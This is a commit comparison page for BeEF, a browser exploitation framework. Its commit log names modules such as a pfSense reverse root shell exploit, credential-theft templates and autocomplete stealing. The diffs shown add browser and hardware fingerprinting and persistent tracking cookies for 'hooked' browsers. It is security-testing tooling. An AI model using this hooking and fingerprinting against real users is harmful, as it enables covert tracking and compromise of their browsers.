Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.4.0
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
...
compare: Hiddenden:beef-0.4.4.2.1
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

114 Commits
beef-0.4.4 ... beef-0.4.4

Author SHA1 Message Date
Brendan Coles
ed661e2a22 Merge pull request #845 from bcoles/raw_http 
Add 'bind_raw' to asset handler
 2013-02-22 23:21:40 -08:00
bcoles
0d8521dd7b Add 'bind_raw' to asset handler 2013-02-23 16:57:47 +10:30
bcoles
bf2dc1d387 Remove redundant line 2013-02-23 15:27:54 +10:30
bcoles
8f1a26ffa9 Add "Hardware" to console browser details 2013-02-23 15:27:29 +10:30
bcoles
de1ab2d1f9 Fix issue #838 
Fixes detect_toolbars target configuration
 2013-02-23 12:32:57 +10:30
bcoles
772b2fd1e7 Add VLC details to hooked browser balloon popup 
Part of issue #828
 2013-02-22 12:14:43 +10:30
Brendan Coles
765c834f78 Merge pull request #844 from Nbblrr/master 
Plugin for VLC detection (ticket #828)
 2013-02-21 17:58:55 -08:00
Nbblrr
7eec331cf9 Plugin for VLC detection #828 2013-02-21 23:14:28 +01:00
Wade Alcorn
1c252af145 Updated version number to make explicit the patched Rack::File xss fix 2013-02-21 21:10:24 +10:00
antisnatchor
5a15a9afdd Merge remote-tracking branch 'origin/master' 2013-02-20 11:58:11 +00:00
antisnatchor
c37f0e1719 Patched Rack::File to don't reflect the URI path in the page if a file is not found. Official patch is not out yet. 2013-02-20 11:57:37 +00:00
bcoles
0734bb0750 Update Proxy tab 2013-02-20 00:57:53 +10:30
bcoles
4718075b2c Add Yammer template to Pretty Theft module 2013-02-19 16:01:10 +10:30
bcoles
514f367803 Merge branch 'master' of https://github.com/beefproject/beef 2013-02-19 15:20:02 +10:30
bcoles
753a78f5fc Add YouTube template to Pretty Theft module 2013-02-19 15:19:27 +10:30
antisnatchor
c222d0e4e3 Patched BeEF hook core to support injection when the hooked domain uses HttpOnly. 2013-02-18 17:19:49 +00:00
Brendan Coles
5e257d4e33 Merge pull request #843 from gcattani/834-hasRealPlayer 
Add RealPlayer detection
 2013-02-17 08:30:40 -08:00
gcatt
007769aa93 Corrected mistake 2013-02-17 12:41:30 +01:00
gcatt
63695e66d7 Add RealPlayer detection 2013-02-17 12:37:56 +01:00
antisnatchor
074a11c85a Updated Chrome sample extension with latest requirements (CSP/version/etc.). Not it works on latest Chrome. Also Updated the fake_flash_update description with more info. 2013-02-12 10:53:19 +00:00
Brendan Coles
88086811a0 Merge pull request #842 from bcoles/isTouchEnabled 
Add beef.hardware.isTouchEnabled()
 2013-02-10 08:57:53 -08:00
bcoles
90174dda23 Add beef.hardware.isTouchEnabled() 2013-02-11 02:46:35 +10:30
bmantra
fa7b90f123 Merge pull request #840 from bmantra/master 
Metasploit auto launcher not supported on windows
 2013-02-06 10:53:36 -08:00
bmantra
17aa898099 correct last commit, set auto_msfrpcd back to false 2013-02-06 19:42:14 +01:00
bmantra
f879584f1b changed windows default path and changed message 2013-02-06 19:37:31 +01:00
bmantra
2d27266fc9 added message that metasploit auto launch is not available on MS Windows 2013-02-06 19:22:12 +01:00
bcoles
2d08183eef Refactor 'select_zombie_summary' 
extensions/admin_ui/controllers/modules/modules.rb
    extensions/console/lib/shellinterface.rb

Fix issue #837
 2013-02-07 02:44:40 +10:30
bcoles
bf19223a01 Add 'HasQuickTime' to core/main/handlers/browserdetails.rb 2013-02-07 02:43:58 +10:30
bcoles
11a56c5ce9 Add hasQuickTime to browser object 2013-02-05 01:41:21 +10:30
antisnatchor
4852cab66d Properly adjusted onClose command module to annoy the user also in latest Firefox. 2013-02-04 12:09:46 +00:00
bcoles
79e8f34b06 Add QuickTime to zombie balloon details 
Add 'modules/browser/detect_quicktime'
 2013-02-04 09:10:59 +10:30
radoen
4003b69646 Update core/main/client/browser.js 2013-02-03 12:32:25 +01:00
radoen
ad2a93fc60 Merge branch 'master' of github.com:beefproject/beef 2013-02-03 11:30:37 +01:00
radoen
4e73163403 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-03 01:45:01 +01:00
bcoles
19d1827c36 Add 'Steal Autocomplete' module 
Part of issue #601
 2013-02-03 08:51:04 +10:30
radoen
fdf3dff690 ISSUES #817 
to refine UI rendering.

Note In FF 21.xx the old detection method correctly work yet
 2013-02-02 22:07:28 +01:00
bcoles
f7b55be03a Add 'beef.browser.hasQuickTime()' 
Merged manually from https://github.com/beefproject/beef/pull/836

Fix issue #835

starting
 2013-02-03 05:59:06 +10:30
bcoles
ce1cc61ac1 Add ActiveX and Silverlight to zombie balloon details 2013-02-03 05:47:07 +10:30
bcoles
8b56a147a9 Rename 'System Platform' to 'Browser Platform' in UI 2013-02-03 05:28:49 +10:30
bcoles
449c6633aa Rename 'System Platform' to 'Browser Platform' 2013-02-03 05:24:48 +10:30
bcoles
95970d5364 Add 'beef.browser.hasSilverlight()' 
Add 'modules/browser/detect_silverlight'
 2013-02-03 04:42:13 +10:30
bcoles
2c10dd040c Add 'beef.hardware.isLaptop()' 2013-02-03 03:55:14 +10:30
bcoles
cdc92f084e Add laptop icon 2013-02-03 03:41:29 +10:30
bcoles
15a502bce6 Add CPU type to browser initialization 
Add support for Firefox 19
 2013-02-03 03:39:30 +10:30
bcoles
10bdcce34a Fix typos in 'beef.hardware.cpuType()' and OS detection 2013-02-03 03:36:41 +10:30
bcoles
7dc1882427 Add virtual machine icon to browser 
'BeEF::Core::Models::BrowserDetails::hw_icon()'
 2013-02-03 03:02:27 +10:30
bcoles
78162e6d26 Add 'beef.hardware.cpuType()' 2013-02-03 03:01:54 +10:30
bcoles
6913e97e2e Update Windows OS detection 
Add functions:
  beef.os.isWinCE()
  beef.os.isWin2000SP1()
  beef.os.isWindows()
 2013-02-03 03:01:18 +10:30
Wade Alcorn
0df85344f0 Changed ActiveX detection slightly 2013-02-01 07:11:53 +10:00
bcoles
c88a2bb8e3 Update 'Detect Virtual Machine' module 2013-02-01 04:32:16 +10:30
bcoles
e3dced8a9e Add virtual machine icon 2013-02-01 04:30:25 +10:30
bcoles
30171693ff Add 'beef.hardware.isVirtualMachine()' 
Rename 'beef.hardware.getMobileName()' to 'beef.hardware.getName()'
 2013-02-01 04:29:06 +10:30
bcoles
065276932c Add os_fingerprinting module 2013-02-01 02:51:45 +10:30
bcoles
61d0bf2e14 Add beef.browser.hasActiveX() 
Add modules/browser/detect_activex module

Fix issue #832
 2013-02-01 01:22:45 +10:30
bcoles
06221d2540 cleanup .gitignore 2013-02-01 01:06:31 +10:30
Brendan Coles
e14be26951 Merge pull request #827 from gcattani/master 
Module: Detect Toolbars
 2013-01-31 07:10:00 -08:00
gcatt
daadf59782 Module: Detect Toolbars 
Added a module to detect browser toolbars by checking the User-Agent
and the DOM
 2013-01-31 09:20:32 +01:00
bcoles
c085c2d3d7 Add detection for IE10 
Fixes issue #818
 2013-01-28 01:05:31 +10:30
bcoles
209e64a9ef Add IE 7-9 detection to browser_fingerprinting module 2013-01-28 01:02:53 +10:30
bcoles
3cb7bb9f51 Add support for Windows 8 2013-01-28 01:01:29 +10:30
bcoles
e8d85b550b Rename "Detect Chrome/Firefox Extensions" module to "Detect Extensions" 
Added placeholder for IE toolbar detection
 2013-01-27 22:35:14 +10:30
Wade Alcorn
29480a24da Version number updated 2013-01-27 14:40:16 +10:00
bmantra
777f796243 Merge pull request #823 from bmantra/master 
pfSense reverse root remote shell #812
 2013-01-25 12:08:22 -08:00
bmantra
8cd570c62d pfsense reverse root shell exploit #812 2013-01-25 21:05:43 +01:00
bmantra
e383b7f9d5 Merge pull request #822 from bmantra/master 
added pfSense detection to internal fingerprint module
 2013-01-25 10:54:17 -08:00
bmantra
1ad6039f0a fingerprint network detect pfSense 2013-01-25 19:52:09 +01:00
bcoles
8d151fb818 Add HTTPS support for internal_network_fingerprinting module 
Comment out a few fingerprints for 'rare' software in order to increase
speed
 2013-01-25 12:34:04 +10:30
antisnatchor
e321d6e3d8 Added support for Chrome 24 2013-01-23 11:39:26 +00:00
ben-waugh
3433e44d74 LiveCD - improved interrupt capture 2013-01-23 17:20:33 +10:00
ben-waugh
152edc445d LiveCD - added MSF integration 2013-01-23 17:09:38 +10:00
ben-waugh
81be99074a Metasploit extension config - added livecd path 2013-01-23 07:08:04 +10:00
ben-waugh
d81dc8044e LiveCD - fixed a bug in menu display showing sqlmap enabled 2013-01-22 09:57:43 +10:00
ben-waugh
56d6b54d08 BeEFLive - New Menu 
replaces the old tree/Q&A style for a menu presenting all options
 2013-01-22 09:53:51 +10:00
Christian Frichot
2d9b894a3c Added some further comments to the new AssetHandler redirector. See #664 2013-01-20 17:03:26 +08:00
Christian Frichot
3c4a0fad34 New bind_redirect method added to the AssetHandler. See #664 2013-01-20 16:59:01 +08:00
antisnatchor
63b7d44a5e Enabled debug_modules tests. Now they work properly and are effective to automatically check if command modules generally work. 2013-01-17 14:17:04 +00:00
qswain2
f584403a92 Move jools tests to integration 
Moved tc_jools to integrations test directory
since the requires seem to be what were breaking
the other tests in the unit test suit
 2013-01-16 05:47:09 -05:00
Saafan
efa4854b79 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-15 17:04:12 +02:00
Saafan
cc49004189 Fix IE java detection. 2013-01-15 17:03:54 +02:00
Michele Orru
c8c6d30468 Merge pull request #778 from Skyr/master 
Fix for Javascript errors in Phonegap
 2013-01-15 03:56:50 -08:00
qswain2
fcbd2516e6 Add test cases for jools 
Added test cases for jools based on examples
 2013-01-14 23:12:55 -05:00
bcoles
224cf0c7d0 Added window.devicePixelRatio to Firefox 18 detection 2013-01-12 14:26:16 +10:30
bcoles
c2dbc50d00 Added support for Firefox 18 2013-01-10 08:44:50 +10:30
antisnatchor
c1fefecf70 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-09 15:01:50 +00:00
antisnatchor
60589dc607 Minor changes to MiTB core. 2013-01-09 15:01:07 +00:00
Saafan
5d9821aa74 Temporary workaround to fix IE not being hooked due to java detection code. 2013-01-09 00:47:45 +02:00
root
0f40a0fb9a Merge branch 'master' of https://github.com/beefproject/beef 2013-01-07 01:32:29 -05:00
root
6c16a89328 Added simple adblock checks for IE from issue #803 2013-01-07 01:30:44 -05:00
bcoles
e275e4001c Add SQLiteManager XSS module 2013-01-07 12:30:24 +10:30
Brendan Coles
644a53cb2c Merge pull request #816 from Nbblrr/master 
Pull Request : Module Detect extensions on Firefox
 2013-01-06 13:50:53 -08:00
Nbblrr
87afb9a31b Improved extension detection with the old Firefox hack #815 2013-01-06 22:39:43 +01:00
bcoles
bd2b002314 Fix a few typos 2013-01-07 05:17:55 +10:30
Michele Orru
15eb6a4b07 Merge pull request #813 from Nbblrr/master 
Merge of Hardware detection improvement with mdetect (#722)
 2013-01-06 04:40:10 -08:00
Nbblrr
da7a7b9603 Improved Hardware detection with mdetect 2. #722 2013-01-05 20:43:28 +01:00
Nbblrr
3fe37ec7b1 Improved Hardware detection with mdetect. Ticket #722 2013-01-05 00:03:25 +01:00
Christian Frichot
9c6802cd8f Updated QR Code Extension - URLs can now be full, not just sub-domains #811 2013-01-03 19:25:00 +08:00
Michele Orru
00ad35d878 Merge pull request #809 from phillcampbell/development 
Remove Thin 'Server' response header
 2013-01-03 01:47:58 -08:00
Phill Campbell
cae2559fa3 Remove Thin 'Server' response header 2013-01-02 23:29:21 +00:00
antisnatchor
ba02b6ec87 Merge branch 'master' of https://github.com/beefproject/beef 2013-01-02 21:35:02 +01:00
ben-waugh
12fe2ed86c LiveCD - updated links and copyright year 2013-01-03 07:31:34 +10:00
antisnatchor
c0a256f1b0 Refactored Ipec and Autorun tabs to use the new beefwui object: get_rest_token is now a common function :D 2013-01-02 20:09:23 +01:00
antisnatchor
1ce620a626 Created a new beef_common.js files with common functions for the Web UI. Registered as beefwui in the main window object. 2013-01-02 20:07:49 +01:00
antisnatchor
cea8a4b0e3 ARE: fixed bug which was preventing the execution of modules without input. 2013-01-02 19:03:27 +01:00
antisnatchor
1cd83663aa ARE: properly closed a couple of more statements. 2013-01-02 18:37:26 +01:00
antisnatchor
b6b968a7a0 ARE: removed a couple of unneeded commas. 2013-01-02 18:33:57 +01:00
antisnatchor
276d465dd1 ARE: properly closed a couple of statements. 2013-01-02 18:31:23 +01:00
antisnatchor
8947d78d66 ARE: added mod_id to the multi_module API call. The bug was preventing correct module calling. 2013-01-02 18:30:06 +01:00
antisnatchor
98da93fb12 ARE: fixed hardcoded URLs 2013-01-02 18:07:53 +01:00
qswain2
f39b16712a Added auto-run tab 
Added a new tab in the ui for the auto-run.
and allows modules to be selected with a
checkboxes.Added a handler to hide autorun
tab. Added stubs to ARE.
 2013-01-01 18:01:53 -05:00
antisnatchor
d976e86cbe Refactored mitm.js AJAX sniffing feature. Fixed a couple of other bugs in mitb.js 2012-12-30 13:13:10 +01:00
ben-waugh
0244980db0 LiveCD - Added proxy demo for sqlmap #789 2012-12-30 17:34:06 +10:00
ben-waugh
0580b86744 Move liveCD Script to a new folder #781 2012-12-30 16:23:50 +10:00
Wade Alcorn
701dd34c83 Version number updated 2012-12-30 12:48:45 +10:00
Stefan Schlott
df365b74c2 Fix Javascript errors in Phonegap (see #777) 2012-12-11 15:54:41 +01:00
105 changed files with 5945 additions and 2347 deletions
Expand all files Collapse all files

4
.gitignore vendored
View File

@@ -1,3 +1,5 @@
beef.db
test/msf-test
custom-config.yaml
custom-config.yaml
.DS_Store
.gitignore

112
BeEFLive.sh
View File

@@ -1,110 +1,2 @@
#!/bin/bash
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'home/beef/doc/COPYING' for copying permission
#
#
# This is the auto startup script for the BeEF Live CD.
# IT SHOULD ONLY BE RUN ON THE LIVE CD
# Download LiveCD here: https://github.com/beefproject/beef/downloads
#
# This script contains a few fixes to make BeEF play nicely with the way
# remastersys creates the live cd distributable as well as generating host keys
# to enable SSH etc. The script also make it easy for the user to update/start
# the BeEF server
#
clear
echo "======================================"
echo " BeEF Live CD "
echo "======================================"
echo ""
echo "Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net"
echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
echo "See the file 'home/beef/doc/COPYING' for copying permission"
echo ""
echo "Welcome to the BeEF Live CD"
echo ""
echo ""
#
# Check for SSH Host Keys - if they do not exist ask user if they should be
# created (remastersys has a habit of deleting them during Live CD Creation)
#
f1="/etc/ssh/ssh_host_rsa_key"
if [ -f $f1 ]
then
echo ""
else
echo -n "Would you like to enable ssh (y/N)? "
read var
if [ $var = "y" ] ; then
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
fi
fi
echo ""
#
# Prompt the user if they would like to update BeEF and
# other components installed (such as sqlmap and msf)
#
echo -n "Check and install updates for BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/beef
git stash
git pull
fi
echo ""
echo -n "Check and install updates for msf and sqlmap (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/sqlmap
git stash
git pull
cd /opt/metasploit-framework
git stash
git pull
fi
#
# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
# (if they do not yet exist)
#
f1="beef"
if [ -f $f1 ] ; then
echo ""
else
ln -s /opt/beef/ beef
ln -s /opt/metasploit-framework/ msf
ln -s /opt/sqlmap/ sqlmap
fi
#
# Prompt the user if they would like start BeEF
#
echo -n "Start BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
echo ""
echo "Starting BeEF..";
cd /opt/beef
ruby beef -x
fi
# Reference for old (<1.2) versions of BeEF Live
bash /opt/beef/liveCD/BeEFLive.sh

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.3.9-alpha
0.4.4.2.1-alpha

2
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.9-alpha'
version: '0.4.4.2.1-alpha'
debug: false
restrictions:

2
core/bootstrap.rb
View File

@@ -24,6 +24,8 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'

35
core/main/client/are.js
View File

@@ -9,8 +9,39 @@ beef.are = {
var Jools = require('jools');
this.ruleEngine = new Jools();
},
rules:[],
send:function(module){
// there will probably be some other stuff here before things are finished
this.commands.push(module);
},
execute:function(inputs){
this.rulesEngine.execute(input);
},
cache_modules:function(modules){},
rules:[
{
'name':"exec_no_input",
'condition':function(command,browser){
//need to figure out how to handle the inputs
return (!command['inputs'] || command['inputs'].length == 0)
},
'consequence':function(command,browser){}
},
{
'name':"module_has_sibling",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
},
{
'name':"module_depends_on_module",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
}
],
commands:[],
results:[]
};
beef.regCmp("beef.are");
beef.regCmp("beef.are");

3260
core/main/client/browser.js
View File

File diff suppressed because one or more lines are too long

119
core/main/client/hardware.js
View File

@@ -7,39 +7,51 @@
beef.hardware = {
ua: navigator.userAgent,
isWinPhone: function() {
return (this.ua.match('(Windows Phone)')) ? true : false;
},
isIphone: function() {
return (this.ua.indexOf('iPhone') != -1) ? true : false;
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
},
isIpad: function() {
return (this.ua.indexOf('iPad') != -1) ? true : false;
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
isIpod: function() {
return (this.ua.indexOf('iPod') != -1) ? true : false;
isVirtualMachine: function() {
if (screen.width % 2 || screen.height % 2) return true;
return false;
},
isLaptop: function() {
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
isBlackBerry: function() {
return (this.ua.match('BlackBerry')) ? true : false;
},
isZune: function() {
return (this.ua.match('ZuneWP7')) ? true : false;
},
isKindle: function() {
return (this.ua.match('Kindle')) ? true : false;
},
isHtc: function() {
return (this.ua.match('HTC')) ? true : false;
},
@@ -48,10 +60,6 @@ beef.hardware = {
return (this.ua.match('Ericsson')) ? true : false;
},
isNokia: function() {
return (this.ua.match('Nokia')) ? true : false;
},
isMotorola: function() {
return (this.ua.match('Motorola')) ? true : false;
},
@@ -60,20 +68,59 @@ beef.hardware = {
return (this.ua.match('Nexus One')) ? true : false;
},
getName: function() {
/**
* Returns true if the browser is on a Mobile Phone
* @return: {Boolean} true or false
*
* @example: if(beef.hardware.isMobilePhone()) { ... }
**/
isMobilePhone: function() {
return DetectMobileQuick();
},
if (this.isNokia()) return 'Nokia';
if (this.isWinPhone()) return 'Windows Phone';
if (this.isBlackBerry()) return 'BlackBerry';
if (this.isIphone()) return 'iPhone';
if (this.isIpad()) return 'iPad';
if (this.isIpod()) return 'iPod';
if (this.isKindle()) return 'Kindle';
if (this.isHtc()) return 'HTC';
if (this.isMotorola()) return 'Motorola';
if (this.isZune()) return 'Zune';
if (this.isGoogle()) return 'Google';
if (this.isEricsson()) return 'Ericsson';
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(DetectIphone()) { return "iPhone"};
if(DetectIpod()) { return "iPod Touch"};
if(DetectIpad()) { return "iPad"};
if (this.isHtc()) { return 'HTC'};
if (this.isMotorola()) { return 'Motorola'};
if (this.isZune()) { return 'Zune'};
if (this.isGoogle()) { return 'Google Nexus One'};
if (this.isEricsson()) { return 'Ericsson'};
if(DetectAndroidPhone()) { return "Android Phone"};
if(DetectAndroidTablet()) { return "Android Tablet"};
if(DetectS60OssBrowser()) { return "Nokia S60 Open Source"};
if(ua.search(deviceS60) > -1) { return "Nokia S60"};
if(ua.search(deviceS70) > -1) { return "Nokia S70"};
if(ua.search(deviceS80) > -1) { return "Nokia S80"};
if(ua.search(deviceS90) > -1) { return "Nokia S90"};
if(ua.search(deviceSymbian) > -1) { return "Nokia Symbian"};
if (this.isNokia()) { return 'Nokia'};
if(DetectWindowsPhone7()) { return "Windows Phone 7"};
if(DetectWindowsMobile()) { return "Windows Mobile"};
if(DetectBlackBerryTablet()) { return "BlackBerry Tablet"};
if(DetectBlackBerryWebKit()) { return "BlackBerry OS 6"};
if(DetectBlackBerryTouch()) { return "BlackBerry Touch"};
if(DetectBlackBerryHigh()) { return "BlackBerry OS 5"};
if(DetectBlackBerry()) { return "BlackBerry"};
if(DetectPalmOS()) { return "Palm OS"};
if(DetectPalmWebOS()) { return "Palm Web OS"};
if(DetectGarminNuvifone()) { return "Gamin Nuvifone"};
if(DetectArchos()) { return "Archos"}
if(DetectBrewDevice()) { return "Brew"};
if(DetectDangerHiptop()) { return "Danger Hiptop"};
if(DetectMaemoTablet()) { return "Maemo Tablet"};
if(DetectSonyMylo()) { return "Sony Mylo"};
if(DetectAmazonSilk()) { return "Kindle Fire"};
if(DetectKindle()) { return "Kindle"};
if(DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
if(DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}

21
core/main/client/lib/evercookie.js
View File

@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")

706
core/main/client/lib/mdetect.js Normal file
View File

@@ -0,0 +1,706 @@
/* *******************************************
// Copyright 2010-2012, Anthony Hand
// mdetect : http://code.google.com/p/mobileesp/source/browse/JavaScript/mdetect.js r215
// LICENSE INFORMATION
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
// http://www.apache.org/licenses/LICENSE-2.0
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
// either express or implied. See the License for the specific
// language governing permissions and limitations under the License.
// *******************************************
*/
var isIphone = false;
var isAndroidPhone = false;
var isTierTablet = false;
var isTierIphone = false;
var isTierRichCss = false;
var isTierGenericMobile = false;
var engineWebKit = "webkit";
var deviceIphone = "iphone";
var deviceIpod = "ipod";
var deviceIpad = "ipad";
var deviceMacPpc = "macintosh"; //Used for disambiguation
var deviceAndroid = "android";
var deviceGoogleTV = "googletv";
var deviceXoom = "xoom"; //Motorola Xoom
var deviceHtcFlyer = "htc_flyer"; //HTC Flyer
var deviceNuvifone = "nuvifone"; //Garmin Nuvifone
var deviceSymbian = "symbian";
var deviceS60 = "series60";
var deviceS70 = "series70";
var deviceS80 = "series80";
var deviceS90 = "series90";
var deviceWinPhone7 = "windows phone os 7";
var deviceWinMob = "windows ce";
var deviceWindows = "windows";
var deviceIeMob = "iemobile";
var devicePpc = "ppc"; //Stands for PocketPC
var enginePie = "wm5 pie"; //An old Windows Mobile
var deviceBB = "blackberry";
var vndRIM = "vnd.rim"; //Detectable when BB devices emulate IE or Firefox
var deviceBBStorm = "blackberry95"; //Storm 1 and 2
var deviceBBBold = "blackberry97"; //Bold 97x0 (non-touch)
var deviceBBBoldTouch = "blackberry 99"; //Bold 99x0 (touchscreen)
var deviceBBTour = "blackberry96"; //Tour
var deviceBBCurve = "blackberry89"; //Curve 2
var deviceBBCurveTouch = "blackberry 938"; //Curve Touch 9380
var deviceBBTorch = "blackberry 98"; //Torch
var deviceBBPlaybook = "playbook"; //PlayBook tablet
var devicePalm = "palm";
var deviceWebOS = "webos"; //For Palm's line of WebOS devices
var deviceWebOShp = "hpwos"; //For HP's line of WebOS devices
var engineBlazer = "blazer"; //Old Palm browser
var engineXiino = "xiino";
var deviceKindle = "kindle"; //Amazon Kindle, eInk one
var engineSilk = "silk"; //Amazon's accelerated Silk browser for Kindle Fire
var vndwap = "vnd.wap";
var wml = "wml";
var deviceTablet = "tablet"; //Generic term for slate and tablet devices
var deviceBrew = "brew";
var deviceDanger = "danger";
var deviceHiptop = "hiptop";
var devicePlaystation = "playstation";
var deviceNintendoDs = "nitro";
var deviceNintendo = "nintendo";
var deviceWii = "wii";
var deviceXbox = "xbox";
var deviceArchos = "archos";
var engineOpera = "opera"; //Popular browser
var engineNetfront = "netfront"; //Common embedded OS browser
var engineUpBrowser = "up.browser"; //common on some phones
var engineOpenWeb = "openweb"; //Transcoding by OpenWave server
var deviceMidp = "midp"; //a mobile Java technology
var uplink = "up.link";
var engineTelecaQ = 'teleca q'; //a modern feature phone browser
var devicePda = "pda";
var mini = "mini"; //Some mobile browsers put 'mini' in their names.
